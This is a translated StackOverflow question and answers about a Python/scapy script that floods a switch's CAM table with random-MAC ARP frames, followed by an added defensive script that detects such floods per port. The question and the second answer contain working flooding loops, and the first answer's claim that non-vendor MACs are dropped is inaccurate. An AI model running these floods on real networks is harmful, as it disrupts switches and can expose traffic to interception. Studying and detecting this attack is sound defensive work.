python/scapy mac flooding script

Note: this page is a Chinese-English parallel translation of a popular StackOverflow question, provided under the CC BY-SA 4.0 license. You are free to use and share it, but you must follow the same CC BY-SA license, cite the original URL and author information, and attribute it to the original authors (not me). Original StackOverflow URL: http://stackoverflow.com/questions/1487389/

Time: 2020-11-03 22:23:22  Source: igfitidea

python scapy

Asked by emada

I'm trying to make a small MAC flood tool in Python to fill my switch's CAM tables, but I can't make the magic happen. Can you see what I'm doing wrong?

from scapy.all import *
while 1:
  dest_mac = RandMAC()
  src_mac = RandMAC()
  sendp(Ether(src=src_mac, dst=dest_mac)/ARP(op=2, psrc="0.0.0.0", hwsrc=src_mac, hwdst=dest_mac)/Padding(load="X"*18), verbose=0)

While the code seems to run fine, it just doesn't do its job. To test it, I used Wireshark to look at the packets, then ran THC's parasite "which works", and the packets are almost the same, so I'm not sure what is going on. Thank you for any help.

Answered by Doc

You can only use some MAC addresses: a MAC address is composed of six groups of two hexadecimal digits, separated by hyphens (-) or colons (:). The first three fields must be filled with some values, different for every vendor. If these fields are not set with any vendor code, the server (or the client) will drop the packet. You can find the MAC vendors list in the Wireshark manuf file, or simply look for it with Google. You can check the address by typing "sudo ifconfig IFACE ether hw ADDRESS" in the terminal.

Answered by dc5553

Emada,

MAC addresses are learned by switches by using the source address only, so no need to worry about destination randomizing.

I have tested this and it seems to work well. You might also want to try the sendpfast option for flooding; however, in my testing here sendp seemed to work faster?

from scapy.all import *

while 1:
    sendp(Ether(src=RandMAC(),dst="FF:FF:FF:FF:FF:FF")/ARP(op=2, psrc="0.0.0.0", hwdst="FF:FF:FF:FF:FF:FF")/Padding(load="X"*18))
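
The defender's side of the point made in the answer above (switches learn from source addresses only), as an added example that is not part of the original post: it flags a port that introduces too many never-seen source MACs in one time window. The record layout `(timestamp, port, src_mac)`, the port names, the thresholds and the sample frames are all assumptions constructed for illustration.

```python
from collections import defaultdict

def is_unicast_global(mac):
    """True if the MAC is unicast and globally administered (carries a vendor OUI)."""
    first_octet = int(mac.replace("-", ":").split(":")[0], 16)
    return (first_octet & 0x01) == 0 and (first_octet & 0x02) == 0

def detect_mac_flood(frames, window=1.0, max_new=50):
    """frames: iterable of (timestamp_seconds, port, src_mac).
    Returns (port, window_start, new_macs, non_vendor_macs) for every window
    in which a port introduced more than max_new unseen source MACs."""
    seen = defaultdict(set)           # port -> source MACs already learned
    new_per_win = defaultdict(int)    # (port, window index) -> new MAC count
    odd_per_win = defaultdict(int)    # same key -> multicast/locally administered
    for ts, port, mac in frames:
        mac = mac.lower()
        if mac in seen[port]:
            continue                  # a known host does not grow the table
        seen[port].add(mac)
        key = (port, int(ts // window))
        new_per_win[key] += 1
        if not is_unicast_global(mac):
            odd_per_win[key] += 1
    return [(port, idx * window, n, odd_per_win[(port, idx)])
            for (port, idx), n in sorted(new_per_win.items()) if n > max_new]

def sample_frames():
    """Constructed capture: one normal port and one port with 200 new sources."""
    frames = []
    hosts = ["00:1a:2b:00:00:01", "00:1a:2b:00:00:02", "00:1a:2b:00:00:03"]
    for i in range(30):               # Gi0/1: three stable hosts over 3 seconds
        frames.append((i * 0.1, "Gi0/1", hosts[i % 3]))
    for i in range(200):              # Gi0/2: 200 distinct sources within 1 second
        mac = "%02x:00:00:00:00:%02x" % (i, i)
        frames.append((1.0 + i * 0.004, "Gi0/2", mac))
    return frames

if __name__ == "__main__":
    for alert in detect_mac_flood(sample_frames()):
        print("port %s window@%.1fs: %d new MACs, %d without vendor OUI bits" % alert)
```

On managed switches the matching control is a per-port limit on learned source addresses (port security), which bounds the same counter this check watches.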